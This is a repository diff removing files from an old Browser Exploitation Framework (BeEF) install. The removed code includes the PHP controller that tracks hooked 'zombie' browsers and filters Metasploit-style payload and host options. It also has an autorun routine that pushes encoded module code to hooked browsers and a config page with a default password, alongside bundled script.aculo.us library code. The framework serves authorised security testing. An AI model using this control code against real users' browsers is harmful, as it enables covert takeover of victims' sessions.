if(strlen($payload) > 50) {
return FALSE;
}
if( !preg_match("/[a-z_]+\/[a-z_]+[\/[a-z_]+]{0,1}/", $payload) ) {
return FALSE;
}
return $payload;
}
function valid_exitfunc($func) {
if ( ($func == "seh") || ($func == "thread") || ($func == "process") ) {
return true;
}
return true;
}
function valid_srvhost($ip) {
return valid_ip($ip);
}
function valid_srvport($port) {
return valid_port($port);
}
function valid_urlpath($path) {
if( ! preg_match("/^[a-zA-Z0-9\/\.]*$/", $path) ) return FALSE;
return TRUE;
}
function get_and_filter_smb_capture_options() {
$options = array();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
return $options;
}
function get_and_filter_module_options() {
$options = array();
// PAYLOAD
$options["PAYLOAD"] = get_and_filter_payload();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// LPORT
if($_GET["LPORT"]) {
if(!valid_port($_GET["LPORT"])) return FALSE;
$options["LPORT"] = $_GET["LPORT"];
}
// RHOST
if($_GET["RHOST"]) {
if(!valid_ip($_GET["RHOST"])) return FALSE;
$options["RHOST"] = $_GET["RHOST"];
}
// LHOST
if($_GET["LHOST"]) {
if(!valid_ip($_GET["LHOST"])) return FALSE;
$options["LHOST"] = $_GET["LHOST"];
}
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
// EXITFUNC
if($_GET["EXITFUNC"]) {
if(!valid_exitfunc($_GET["EXITFUNC"])) return FALSE;
$options["EXITFUNC"] = $_GET["EXITFUNC"];
}
return $options;
}
?>

96
include/ui_module.inc.php
View File

@@ -1,96 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// ---[ GET_MODULE_BUTTONS_HTML
// usage: get_module_button_html(button name/lable, browser request path)
function get_module_button_html($name, $path) {
$result = MODULE_BUTTON_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
function get_module_menu_item_html($name, $path) {
$result = MODULE_MENU_ITEM_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
// --[ GET_STANDARD_MODULE_MENU
function get_standard_module_menu() {
$menu_str .= get_module_menu(MODULE_STANDARD_DIR, MODULE_STANDARD_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_browser_module_menu() {
$menu_str .= get_module_menu(MODULE_BROWSER_DIR, MODULE_BROWSER_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_network_module_menu() {
$menu_str .= get_module_menu(MODULE_NETWORK_DIR, MODULE_NETWORK_SUBDIR);
return $menu_str;
}
// --[ GET_INTERPROTOCOL_MODULE_MENU
function get_interprotocol_module_menu() {
$menu_str .= get_module_menu(MODULE_INTERPROTOCOL_DIR, MODULE_INTERPROTOCOL_SUBDIR);
return $menu_str;
}
// ---[ GET_MODULE_MENU
function get_module_menu($module_dir, $module_subdir) {
$result = "";
$wildcard = $module_dir . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = file_get_contents($dirname . '/' . MODULE_NAME_FILENAME);
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/". $module_subdir . "/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_menu_items_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("\n", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/symmetric/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_buttons_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("<br>", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_button_html(trim($name), "/symmetric/" . basename($dirname));
}
return $result;
}
?>

230
include/ui_zombie.inc.php
View File

@@ -1,230 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
require_once("browserdetection.inc.php");
require_once("common.inc.php");
// ---[ GET_ZOMBIE_OS
// the output of this function must be escaped
function get_zombie_os($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return $zombie_heartbeat_contents[3];
}
// ---[ GET_ZOMBIE_BROWSER
// the output of this function must be escaped
function get_zombie_browser($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return trim($zombie_heartbeat_contents[1]) . " " . trim($zombie_heartbeat_contents[2]);
}
// ---[ GET_ZOMBIE_METADATA
function get_zombie_metadata($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_data = trim($zombie_details['ip']);
$zombie_data .= ',' . $zombie_details['agent_image'];
$zombie_data .= ',' . $zombie_details['os_image'];
return $zombie_data;
}
// ---[ GET_ZOMBIE_IP
function get_zombie_ip($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
return trim($zombie_details['ip']);
}
// --[ GET_ZOMBIE_VAR
function get_zombie_var() {
if(!isset($_GET["zombie"])) { beef_error('no zombie submitted'); }
$zombie = $_GET["zombie"];
if(!isset($_SESSION[$zombie])) { beef_error('zombie not in session'); }
return $zombie;
}
// --[ GET_ZOMBIE_DATAFILE
function get_zombie_datafile($filename) {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . $filename;
if(!file_exists($zombie_file)) {
return DNA_STRING;
}
return file_get_contents($zombie_file);
}
// --[ DELETE_ZOMBIE_RESULTS
function delete_zombie_results() {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . RES_FILENAME;
if(file_exists($zombie_file)) {
unlink($zombie_file);
}
}
// ---[ GET_ZOMBIE_LIST
function get_zombie_list() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = md5($dir_name);
if(!empty($result)) $result .= ",";
$result .= $zombie_details['id'];
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = 'none'; }
return $result;
}
// --[ GET_ZOMBIE_MENU
function get_zombie_menu() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = trim(md5($dir_name));
$result .= '<li><a href="javascript:change_zombie(\'' . $zombie_details['id'] . '\')">' .
'<img src="/beef/images/' . $zombie_details['agent_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
'<img src="/beef/images/' . $zombie_details['os_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
$zombie_details['ip'] . '</a></li>';
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = ZOMBIE_NONE; }
return $result;
}
// ---[ GET_ZOMBIE_DATA
function get_zombie_data($file){
$browser_details = file_get_contents($file);
$zombie_data['ip'] = extract_zombie_ip($browser_details);
$zombie_data['agent_image'] = extract_zombie_useragent($browser_details);
$zombie_data['os_image'] = extract_zombie_os($browser_details);
return $zombie_data;
}
// ---[ EXTRACT_ZOMBIE_IP
function extract_zombie_ip($raw_zombie_data) {
// get ip address from data
return substr("$raw_zombie_data",0,strpos($raw_zombie_data,"\n")+strlen("\n"));
}
// ---[ EXTRACT_ZOMBIE_USERAGENT
function extract_zombie_useragent($raw_zombie_data) {
// find agent type
if(stristr($raw_zombie_data, AGENT_FIREFOX_UA_STR)) {
return AGENT_FIREFOX_IMG;
}
if(stristr($raw_zombie_data, AGENT_IE_UA_STR)) {
return AGENT_IE_IMG;
}
if(stristr($raw_zombie_data, AGENT_CHROME_UA_STR)) {
return AGENT_CHROME_IMG;
}
if(stristr($raw_zombie_data, AGENT_SAFARI_UA_STR)) {
return AGENT_SAFARI_IMG;
}
if(stristr($raw_zombie_data, AGENT_KONQ_UA_STR)) {
return AGENT_KONQ_IMG;
}
if(stristr($raw_zombie_data, AGENT_MOZILLA_UA_STR)) {
return AGENT_MOZILLA_IMG;
}
return AGENT_UNKNOWN_IMG;
}
// ---[ EXTRACT_ZOMBIE_OS
function extract_zombie_os($raw_zombie_data) {
// find os type
if(stristr($raw_zombie_data, OS_WINDOWS_UA_STR)) {
return OS_WINDOWS_IMG;
}
if(stristr($raw_zombie_data, OS_LINUX_UA_STR)) {
return OS_LINUX_IMG;
}
if(stristr($raw_zombie_data, OS_MAC_UA_STR)) {
return OS_MAC_IMG;
}
return OS_UNKNOWN_IMG;
}
?>

3718
include/xmlrpc.inc.php
View File

File diff suppressed because it is too large Load Diff

126
index.php
View File

@@ -1,126 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<?php
require_once("include/browserdetection.inc.php");
require_once("include/filter.inc.php");
// set the menu css based upon user agent
$browser_ua = browser($_SERVER['HTTP_USER_AGENT']);
function generate_css_tags($subdirectory) {
$menu_css = ' <link rel="stylesheet" type="text/css" href="css/USERAGENT/menu.css">';
$style_css = ' <link rel="stylesheet" type="text/css" href="css/USERAGENT/style.css">';
echo preg_replace('/USERAGENT/', $subdirectory, $menu_css);
echo preg_replace('/USERAGENT/', $subdirectory, $style_css);
}
// set css based on the user agent
if(stristr($browser_ua['name'], "Firefox")) {
generate_css_tags('firefox');
} elseif(stristr($browser_ua['name'], "Internet Explorer")) {
generate_css_tags('ie');
} elseif(stristr($browser_ua['name'], "Safari")) {
generate_css_tags('safari');
} else {
generate_css_tags('firefox');
}
$url = "http://" . $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
if(! valid_url_without_query($url)) $url = "";
?>
<title>Browser Exploit Framework</title>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<script src="js/prototype.js" type="text/javascript"></script>
<script src="js/scriptaculous.js" type="text/javascript"></script>
<script src="js/common.js" type="text/javascript"></script>
<script>
// ---[ BEEF_ERROR
function beef_error(error_string) {
new Effect.Shake('beef_icon');
alert(error_string);
}
// ---[ SUBMIT_CONFIG
function submit_config(config, passwd) {
new Ajax.Updater('config_results', 'submit_config.php?config=' + config + '&passwd=' + passwd, {asynchronous:true});
}
</script>
</head>
<body>
<!-- SIDEBAR -->
<div id="sidebar">
<!-- BEEF HEADER - LINK AND IMAGE-->
<div id="header">
<center><a href=http://www.bindshell.net/tools/beef/>Browser Exploitation Framework</a></center>
<h1><div id="beef_icon"><img src="images/beef.gif" onclick="new Effect.Shake('sidebar');"></div> BeEF</h1>
</div>
<!-- Security -->
<div id="sidebar_autorun">
<div id="header" onclick="new Effect.Pulsate('zombiesdyn');">
<h2>Security</h2>
</div>
<div id="content">
<!-- DYNAMIC ZOMBIE SECTION -->
<div id="autorun_dyn">BeEF has no security by design <br><br></div>
<div id="autorun_dyn">Default password is <b>BeEFConfigPass</b> <br><br></div>
<div id="autorun_dyn">Edit 'pw.php' in BeEF root to alter the password</div>
</div>
</div>
<!-- INSTALL -->
<div id="sidebar_autorun">
<div id="header" onclick="new Effect.Pulsate('zombiesdyn');">
<!--<h2>Installation</h2>-->
</div>
<div id="content">
<!-- DYNAMIC ZOMBIE SECTION -->
<!-- <div id="autorun_dyn">BeEF has not been installed</div> -->
</div>
</div>
</div>
<!-- MAIN RIGHT SECTION -->
<div id="main">
<div id="page">
<div id="module_header">BeEF Configuration</div>
<br>
<div id="module_subsection">
<form name="configform">
<div id="module_subsection_header">Connection (IP Address or URL)</div>
This is the location that the zombies will connect to (do not include the hook directory). This must match the 'ServerName' value in your http.conf for the modules to work.
<input type="text" name="url" value="<?php echo $url; ?>" autocomplete="off"/>
BeEF configuration password
<input type="password" name="passwd" value="BeEFConfigPass" autocomplete="off"/>
<input class="button" type="button" value="Apply Config" onClick="javascript:submit_config(configform.url.value, configform.passwd.value)"/>
<br>Clicking 'Apply Configuration' will remove/replace these configuration files
</form>
</div>
<div id='config_results'></div>
</div>
</div>
</div>
</body>
</html>

33
js/autorun.js
View File

@@ -1,33 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// --[ AUTORUN CLASS
var Autorun = Class.create();
Autorun.prototype = {
initialize: function() {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>',
this.enabled = false,
this.module = '',
this.code = ''
},
// params: string to be displayed in sidebar, base64 encode code
enable: function(module_name, code) {
this.code = code;
var params = 'data='+code;
new Ajax.Updater('module_status', 'send_cmds.php?action=autorun', {method:'post',parameters:params,asynchronous:false});
this.enabled = true;
this.module = module_name;
$('autorun_dyn').innerHTML = this.module + ' Module Enabled';
},
disable: function() {
var params = 'data=disable';
new Ajax.Updater('module_status', 'send_cmds.php?action=autorun', {method:'post',parameters:params,asynchronous:false});
this.enabled = false;
this.module = '';
this.status = 'Disabled';
$('autorun_dyn').innerHTML = this.status;
}
}

101
js/builder.js
View File

@@ -1,101 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// See scriptaculous.js for full license.
var Builder = {
NODEMAP: {
AREA: 'map',
CAPTION: 'table',
COL: 'table',
COLGROUP: 'table',
LEGEND: 'fieldset',
OPTGROUP: 'select',
OPTION: 'select',
PARAM: 'object',
TBODY: 'table',
TD: 'table',
TFOOT: 'table',
TH: 'table',
THEAD: 'table',
TR: 'table'
},
// note: For Firefox < 1.5, OPTION and OPTGROUP tags are currently broken,
// due to a Firefox bug
node: function(elementName) {
elementName = elementName.toUpperCase();
// try innerHTML approach
var parentTag = this.NODEMAP[elementName] || 'div';
var parentElement = document.createElement(parentTag);
try { // prevent IE "feature": http://dev.rubyonrails.org/ticket/2707
parentElement.innerHTML = "<" + elementName + "></" + elementName + ">";
} catch(e) {}
var element = parentElement.firstChild || null;
// see if browser added wrapping tags
if(element && (element.tagName != elementName))
element = element.getElementsByTagName(elementName)[0];
// fallback to createElement approach
if(!element) element = document.createElement(elementName);
// abort if nothing could be created
if(!element) return;
// attributes (or text)
if(arguments[1])
if(this._isStringOrNumber(arguments[1]) ||
(arguments[1] instanceof Array)) {
this._children(element, arguments[1]);
} else {
var attrs = this._attributes(arguments[1]);
if(attrs.length) {
try { // prevent IE "feature": http://dev.rubyonrails.org/ticket/2707
parentElement.innerHTML = "<" +elementName + " " +
attrs + "></" + elementName + ">";
} catch(e) {}
element = parentElement.firstChild || null;
// workaround firefox 1.0.X bug
if(!element) {
element = document.createElement(elementName);
for(attr in arguments[1])
element[attr == 'class' ? 'className' : attr] = arguments[1][attr];
}
if(element.tagName != elementName)
element = parentElement.getElementsByTagName(elementName)[0];
}
}
// text, or array of children
if(arguments[2])
this._children(element, arguments[2]);
return element;
},
_text: function(text) {
return document.createTextNode(text);
},
_attributes: function(attributes) {
var attrs = [];
for(attribute in attributes)
attrs.push((attribute=='className' ? 'class' : attribute) +
'="' + attributes[attribute].toString().escapeHTML() + '"');
return attrs.join(" ");
},
_children: function(element, children) {
if(typeof children=='object') { // array can hold nodes and text
children.flatten().each( function(e) {
if(typeof e=='object')
element.appendChild(e)
else
if(Builder._isStringOrNumber(e))
element.appendChild(Builder._text(e));
});
} else
if(Builder._isStringOrNumber(children))
element.appendChild(Builder._text(children));
},
_isStringOrNumber: function(param) {
return(typeof param=='string' || typeof param=='number');
}
}

110
js/common.js
View File

@@ -1,110 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// --[ DIFF
// diff two arrays
function diff(a,b) {
var c = new Array();
a.each( function(element) {
if(0 > b.indexOf(element)) {
c.push(element);
}
})
return c;
}
// --[ B64REPLACE
// replace a string in a base64 string
function b64replace(b64str, srcstr, deststr) {
str = decode64(b64str);
str = str.replace(srcstr, deststr);
result = encode64(str);
return result;
}
// array code from http://4umi.com/web/javascript/array.htm
Array.prototype.indexOf=function(n){for(var i=0;i<this.length;i++){if(this[i]===n){return i;}}return -1;}
Array.prototype.lastIndexOf=function(n){var i=this.length;while(i--){if(this[i]===n){return i;}}return -1;}
Array.prototype.forEach=function(f){var i=this.length,j,l=this.length;for(i=0;i<l;i++){if((j=this[i])){f(j);}}};
Array.prototype.insert=function(i,v){if(i>=0){var a=this.slice(),b=a.splice(i);a[i]=value;return a.concat(b);}}
Array.prototype.shuffle=function(){var i=this.length,j,t;while(i--){j=Math.floor((i+1)*Math.random());t=arr[i];arr[i]=arr[j];arr[j]=t;}}
Array.prototype.unique=function(){var a=[],i;this.sort();for(i=0;i<this.length;i++){if(this[i]!==this[i+1]){a[a.length]=this[i];}}return a;}
if(typeof Array.prototype.concat==='undefined'){Array.prototype.concat=function(a){for(var i=0,b=this.copy();i<a.length;i++){b[b.length]=a[i];}return b;};}
if(typeof Array.prototype.copy==='undefined'){Array.prototype.copy=function(a){var a=[],i=this.length;while(i--){a[i]=(typeof this[i].copy!=='undefined')?this[i].copy():this[i];}return a;};}
if(typeof Array.prototype.pop==='undefined'){Array.prototype.pop=function(){var b=this[this.length-1];this.length--;return b;};}
if(typeof Array.prototype.push==='undefined'){Array.prototype.push=function(){for(var i=0,b=this.length,a=arguments;i<a.length;i++){this[b+i]=a[i];}return this.length;};}
if(typeof Array.prototype.shift==='undefined'){Array.prototype.shift=function(){for(var i=0,b=this[0];i<this.length-1;i++){this[i]=this[i+1];}this.length--;return b;};}
if(typeof Array.prototype.slice==='undefined'){Array.prototype.slice=function(a,c){var i=0,b,d=[];if(!c){c=this.length;}if(c<0){c=this.length+c;}if(a<0){a=this.length-a;}if(c<a){b=a;a=c;c=b;}for(i;i<c-a;i++){d[i]=this[a+i];}return d;};}
if(typeof Array.prototype.splice==='undefined'){Array.prototype.splice=function(a,c){var i=0,e=arguments,d=this.copy(),f=a;if(!c){c=this.length-a;}for(i;i<e.length-2;i++){this[a+i]=e[i+2];}for(a;a<this.length-c;a++){this[a+e.length-2]=d[a-c];}this.length-=c-e.length+2;return d.slice(f,f+c);};}
if(typeof Array.prototype.unshift==='undefined'){Array.prototype.unshift=function(a){this.reverse();var b=this.push(a);this.reverse();return b;};}
// Base64 code from Tyler Akins -- http://rumkin.com
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function encode64(input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
do {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) +
keyStr.charAt(enc3) + keyStr.charAt(enc4);
} while (i < input.length);
return output;
}
function decode64(input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
} while (i < input.length);
return output;
}

821
js/controls.js vendored
View File

@@ -1,821 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005 Ivan Krstic (http://blogs.law.harvard.edu/ivan)
// (c) 2005 Jon Tirsen (http://www.tirsen.com)
// Contributors:
// Richard Livsey
// Rahul Bhargava
// Rob Wills
//
// See scriptaculous.js for full license.
// Autocompleter.Base handles all the autocompletion functionality
// that's independent of the data source for autocompletion. This
// includes drawing the autocompletion menu, observing keyboard
// and mouse events, and similar.
//
// Specific autocompleters need to provide, at the very least,
// a getUpdatedChoices function that will be invoked every time
// the text inside the monitored textbox changes. This method
// should get the text for which to provide autocompletion by
// invoking this.getToken(), NOT by directly accessing
// this.element.value. This is to allow incremental tokenized
// autocompletion. Specific auto-completion logic (AJAX, etc)
// belongs in getUpdatedChoices.
//
// Tokenized incremental autocompletion is enabled automatically
// when an autocompleter is instantiated with the 'tokens' option
// in the options parameter, e.g.:
// new Ajax.Autocompleter('id','upd', '/url/', { tokens: ',' });
// will incrementally autocomplete with a comma as the token.
// Additionally, ',' in the above example can be replaced with
// a token array, e.g. { tokens: [',', '\n'] } which
// enables autocompletion on multiple tokens. This is most
// useful when one of the tokens is \n (a newline), as it
// allows smart autocompletion after linebreaks.
if(typeof Effect == 'undefined')
throw("controls.js requires including script.aculo.us' effects.js library");
var Autocompleter = {}
Autocompleter.Base = function() {};
Autocompleter.Base.prototype = {
baseInitialize: function(element, update, options) {
this.element = $(element);
this.update = $(update);
this.hasFocus = false;
this.changed = false;
this.active = false;
this.index = 0;
this.entryCount = 0;
if (this.setOptions)
this.setOptions(options);
else
this.options = options || {};
this.options.paramName = this.options.paramName || this.element.name;
this.options.tokens = this.options.tokens || [];
this.options.frequency = this.options.frequency || 0.4;
this.options.minChars = this.options.minChars || 1;
this.options.onShow = this.options.onShow ||
function(element, update){
if(!update.style.position || update.style.position=='absolute') {
update.style.position = 'absolute';
Position.clone(element, update, {setHeight: false, offsetTop: element.offsetHeight});
}
Effect.Appear(update,{duration:0.15});
};
this.options.onHide = this.options.onHide ||
function(element, update){ new Effect.Fade(update,{duration:0.15}) };
if (typeof(this.options.tokens) == 'string')
this.options.tokens = new Array(this.options.tokens);
this.observer = null;
this.element.setAttribute('autocomplete','off');
Element.hide(this.update);
Event.observe(this.element, "blur", this.onBlur.bindAsEventListener(this));
Event.observe(this.element, "keypress", this.onKeyPress.bindAsEventListener(this));
},
show: function() {
if(Element.getStyle(this.update, 'display')=='none') this.options.onShow(this.element, this.update);
if(!this.iefix &&
(navigator.appVersion.indexOf('MSIE')>0) &&
(navigator.userAgent.indexOf('Opera')<0) &&
(Element.getStyle(this.update, 'position')=='absolute')) {
new Insertion.After(this.update,
'<iframe id="' + this.update.id + '_iefix" '+
'style="display:none;position:absolute;filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ' +
'src="javascript:false;" frameborder="0" scrolling="no"></iframe>');
this.iefix = $(this.update.id+'_iefix');
}
if(this.iefix) setTimeout(this.fixIEOverlapping.bind(this), 50);
},
fixIEOverlapping: function() {
Position.clone(this.update, this.iefix, {setTop:(!this.update.style.height)});
this.iefix.style.zIndex = 1;
this.update.style.zIndex = 2;
Element.show(this.iefix);
},
hide: function() {
this.stopIndicator();
if(Element.getStyle(this.update, 'display')!='none') this.options.onHide(this.element, this.update);
if(this.iefix) Element.hide(this.iefix);
},
startIndicator: function() {
if(this.options.indicator) Element.show(this.options.indicator);
},
stopIndicator: function() {
if(this.options.indicator) Element.hide(this.options.indicator);
},
onKeyPress: function(event) {
if(this.active)
switch(event.keyCode) {
case Event.KEY_TAB:
case Event.KEY_RETURN:
this.selectEntry();
Event.stop(event);
case Event.KEY_ESC:
this.hide();
this.active = false;
Event.stop(event);
return;
case Event.KEY_LEFT:
case Event.KEY_RIGHT:
return;
case Event.KEY_UP:
this.markPrevious();
this.render();
if(navigator.appVersion.indexOf('AppleWebKit')>0) Event.stop(event);
return;
case Event.KEY_DOWN:
this.markNext();
this.render();
if(navigator.appVersion.indexOf('AppleWebKit')>0) Event.stop(event);
return;
}
else
if(event.keyCode==Event.KEY_TAB || event.keyCode==Event.KEY_RETURN ||
(navigator.appVersion.indexOf('AppleWebKit') > 0 && event.keyCode == 0)) return;
this.changed = true;
this.hasFocus = true;
if(this.observer) clearTimeout(this.observer);
this.observer =
setTimeout(this.onObserverEvent.bind(this), this.options.frequency*1000);
},
activate: function() {
this.changed = false;
this.hasFocus = true;
this.getUpdatedChoices();
},
onHover: function(event) {
var element = Event.findElement(event, 'LI');
if(this.index != element.autocompleteIndex)
{
this.index = element.autocompleteIndex;
this.render();
}
Event.stop(event);
},
onClick: function(event) {
var element = Event.findElement(event, 'LI');
this.index = element.autocompleteIndex;
this.selectEntry();
this.hide();
},
onBlur: function(event) {
// needed to make click events working
setTimeout(this.hide.bind(this), 250);
this.hasFocus = false;
this.active = false;
},
render: function() {
if(this.entryCount > 0) {
for (var i = 0; i < this.entryCount; i++)
this.index==i ?
Element.addClassName(this.getEntry(i),"selected") :
Element.removeClassName(this.getEntry(i),"selected");
if(this.hasFocus) {
this.show();
this.active = true;
}
} else {
this.active = false;
this.hide();
}
},
markPrevious: function() {
if(this.index > 0) this.index--
else this.index = this.entryCount-1;
this.getEntry(this.index).scrollIntoView(true);
},
markNext: function() {
if(this.index < this.entryCount-1) this.index++
else this.index = 0;
this.getEntry(this.index).scrollIntoView(false);
},
getEntry: function(index) {
return this.update.firstChild.childNodes[index];
},
getCurrentEntry: function() {
return this.getEntry(this.index);
},
selectEntry: function() {
this.active = false;
this.updateElement(this.getCurrentEntry());
},
updateElement: function(selectedElement) {
if (this.options.updateElement) {
this.options.updateElement(selectedElement);
return;
}
var value = '';
if (this.options.select) {
var nodes = document.getElementsByClassName(this.options.select, selectedElement) || [];
if(nodes.length>0) value = Element.collectTextNodes(nodes[0], this.options.select);
} else
value = Element.collectTextNodesIgnoreClass(selectedElement, 'informal');
var lastTokenPos = this.findLastToken();
if (lastTokenPos != -1) {
var newValue = this.element.value.substr(0, lastTokenPos + 1);
var whitespace = this.element.value.substr(lastTokenPos + 1).match(/^\s+/);
if (whitespace)
newValue += whitespace[0];
this.element.value = newValue + value;
} else {
this.element.value = value;
}
this.element.focus();
if (this.options.afterUpdateElement)
this.options.afterUpdateElement(this.element, selectedElement);
},
updateChoices: function(choices) {
if(!this.changed && this.hasFocus) {
this.update.innerHTML = choices;
Element.cleanWhitespace(this.update);
Element.cleanWhitespace(this.update.firstChild);
if(this.update.firstChild && this.update.firstChild.childNodes) {
this.entryCount =
this.update.firstChild.childNodes.length;
for (var i = 0; i < this.entryCount; i++) {
var entry = this.getEntry(i);
entry.autocompleteIndex = i;
this.addObservers(entry);
}
} else {
